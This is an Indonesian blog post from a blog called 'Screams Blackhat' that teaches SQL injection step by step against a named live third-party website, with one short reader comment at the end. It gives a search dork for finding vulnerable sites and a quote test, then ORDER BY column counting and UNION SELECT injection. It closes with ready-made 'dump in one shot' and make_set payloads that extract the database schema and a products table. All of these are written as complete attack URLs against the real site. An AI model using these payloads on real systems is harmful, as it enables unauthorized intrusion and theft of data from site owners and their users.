Cara Melakukan SQL Injection
Kali ini saya akan berbagi materi tentang bagaimana cara melakukan SQL Injection
Ok langsung saja ke materinya
Dork :
inurl:"index.php?id="
Live target : https://www.smtmax.com/category.php?id=15
Pertama tama kita cek vuln atau tidak webnya dengan memberi tanda ' di id=15
Seperti ini :
https://www.smtmax.com/category.php?id=15'
Jika webnya error itu tandanya webnya vuln
Sebelum di beri tanda '
Setelah di beri tanda '
Oke di sini webnya error = vuln
Selanjutnya kita order by untuk menentukan jumlah column
Seperti ini :
https://www.smtmax.com/category.php?id=15+order+by+1--+-
Naik kan angka 1 menjadi 2 menjadi 3 dan seterusnya hingga webnya memunculkan error
https://www.smtmax.com/category.php?id=15+order+by+2--+- (tidak error)
https://www.smtmax.com/category.php?id=15+order+by+3--+- (tidak error)
https://www.smtmax.com/category.php?id=15+order+by+10--+- (tidak error)
https://www.smtmax.com/category.php?id=15+order+by+14--+- (tidak error)
https://www.smtmax.com/category.php?id=15+order+by+15--+- (error !!)
Nah kita udah mengetahui error nya di angka 15 nah selanjutnya kita ubah +order+by+ menjadi +union+select+
Seperti ini :
https://www.smtmax.com/category.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+-
Jangan lupa memberi tanda - di depan id=-15 supaya webnya memunculkan angka togelnya
Penjelasan union select :
Kenapa union select sampai angka 14 saja? Kan error nya di angka 15? Karna errornya di angka 15 maka kita melakukan union select nya sampai 14 saja, jika errornya di angka 10 kita melakukan union select sampai angka 9.
Oke lanjut
Setelah saya enter
https://www.smtmax.com/category.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+-
Webnya memunculkan angka togelnya
Seperti yang kalian lihat angka togelnya ada di angka 3
Selanjutnya kita buka database webnya dengan memberikan dios (Dump In One Shot) di angka togelnya (3)
Seperti ini :
https://www.smtmax.com/category.php?id=-15+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9,10,11,12,13,14--+-
Dan boom kita telah berhasil memunculkan database webnya
Selanjutnya tinggal kita dump saja table adminnya tapi sayangnya pada live target kita kali ini tidak ada table adminnya, tapi saya akan mencontohkan bagaimana cara dump, saya akan dump table products, column products_image dan products_price
Ubah diosnya menjadi seperti ini :
make_set(6,@:=0x0a,(select(1)from(products)where@:=make_set(511,@,0x3c6c693e,products_image,products_price)),@)
Paste di angka togelnya
https://www.smtmax.com/category.php?id=-15+union+select+1,2,make_set(6,@:=0x0a,(select(1)from(products)where@:=make_set(511,@,0x3c6c693e,products_image,products_price)),@),4,5,6,7,8,9,10,11,12,13,14--+-
Dan boom kita berhasil dump table products
Oke mungkin sekian saja dari saya
Mungkin saya akan sering memberikan materi tentang SQL Injection di blog Screams Blackhat kedepannya, jadi jangan lupa untuk selalu mengikuti blog Screams Blackhat yaa..
Jika ada yang masih kebingungan bisa tanya-tanya saya lewat WhatsApp.
Hy Bang :v
BalasHapus